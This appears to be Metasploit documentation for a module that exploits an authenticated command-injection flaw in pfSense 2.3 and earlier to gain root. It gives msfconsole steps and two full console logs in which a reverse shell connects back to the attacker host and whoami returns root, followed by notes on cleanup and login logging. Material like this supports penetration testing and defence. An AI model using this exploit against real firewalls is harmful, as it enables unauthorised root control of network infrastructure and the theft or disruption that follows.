## Description

  This module exploits a vulnerability in pfSense version 2.3 and before which allows an authenticated user to execute arbitrary operating system commands 
  as root.

  This module has been tested successfully on version 2.3-RELEASE, and 2.2.6.


## Vulnerable Application

  This module has been tested successfully on version CE 2.3 amd64, and 2.2.6 amd64.

  Installer:

  * [pfSense CE 2.3](https://nyifiles.pfsense.org/mirror/downloads/old/pfSense-CE-2.3-RELEASE-amd64.iso.gz)


## Verification Steps

  1. Start `msfconsole`
  2. Do: `use exploit/unix/http/pfsense_group_member_exec`
  3. Do: `set rhost [IP]`
  4. Do: `set username [username]`
  5. Do: `set password [password]`
  6. Do: `exploit`
  7. You should get a session


## Scenarios

### 2.3-Release amd64

```
[*] Processing pfsense.rc for ERB directives.
resource (pfsense.rc)> use exploit/unix/http/pfsense_group_member_exec
resource (pfsense.rc)> set rhost 2.2.2.2
rhost => 2.2.2.2
resource (pfsense.rc)> set verbose true
verbose => true
resource (pfsense.rc)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (pfsense.rc)> check
[*] 2.2.2.2:443 The target service is running, but could not be validated.
resource (pfsense.rc)> exploit
[*] Started reverse double SSL handler on 1.1.1.1:4444 
[*] CSRF Token for login: sid:a11be2ee5849522898e2c1ff23739b35c76435bf,1510545358;ip:d70924f708189287bdee1e08d7fa83758a0e1f68,1510545358
[*] Successful Authentication
[*] pfSense Version Detected: 2.3-RELEASE
[+] Login Successful
[*] CSRF Token for group creation: sid:823a6f854ad1bae307c2959e95ccc98a8d72f2c1,1510545361
[*] Manual removal of group aJPEfJLDKT is required.
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 5ER6rqZOjOSGjRml;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "5ER6rqZOjOSGjRml\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:25824) at 2017-11-19 08:15:00 -0500

whoami
root
uname -a
FreeBSD . 10.3-RELEASE FreeBSD 10.3-RELEASE #6 05adf0a(RELENG_2_3_0): Mon Apr 11 18:52:07 CDT 2016     root@ce23-amd64-builder:/builder/pfsense-230/tmp/obj/builder/pfsense-230/tmp/FreeBSD-src/sys/pfSense  amd64
```
### 2.2.6 amd64

```
[*] Processing pfsense.rc for ERB directives.
resource (pfsense.rc)> use exploit/unix/http/pfsense_group_member_exec
resource (pfsense.rc)> set rhost 3.3.3.3
rhost => 3.3.3.3
resource (pfsense.rc)> set verbose true
verbose => true
resource (pfsense.rc)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (pfsense.rc)> check
[*] 3.3.3.3:443 The target is not exploitable.
resource (pfsense.rc)> exploit
[*] Started reverse double SSL handler on 1.1.1.1:4444 
[*] CSRF Token for login: sid:bb80526160efcf79d8660d1a31f6bf88e154b38e,1511091712;ip:42d05b73fc9b2d31c54333a60fd308dfbd4da97a,1511091712
[*] Successful Authentication
[*] pfSense Version Detected: 2.2.6-RELEASE
[+] Login Successful
[*] CSRF Token for group creation: sid:d49a6dc5b7e98c92a7772c605af3586a1f3adc75,1511091715
[*] Manual removal of group okUPTvzysL is required.
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 7hKg6oD9DkwXYRtt;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "7hKg6oD9DkwXYRtt\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (1.1.1.1:4444 -> 3.3.3.3:34403) at 2017-11-19 06:42:00 -0500

whoami
root
uname -a
FreeBSD pfSense.localdomain 10.1-RELEASE-p25 FreeBSD 10.1-RELEASE-p25 #0 c39b63e(releng/10.1)-dirty: Mon Dec 21 15:20:13 CST 2015     root@pfs22-amd64-builder:/usr/obj.RELENG_2_2.amd64/usr/pfSensesrc/src.RELENG_2_2/sys/pfSense_SMP.10  amd64
```

## Cleanup

Manual cleanup is required. The group name is printed during exploitation.

## Logging

Logging into the web interface writes a line to the system out on the console similar to: `pfSense php-fpm[72834]: /index.php: Succeessful login for user 'admin' from [ip]`
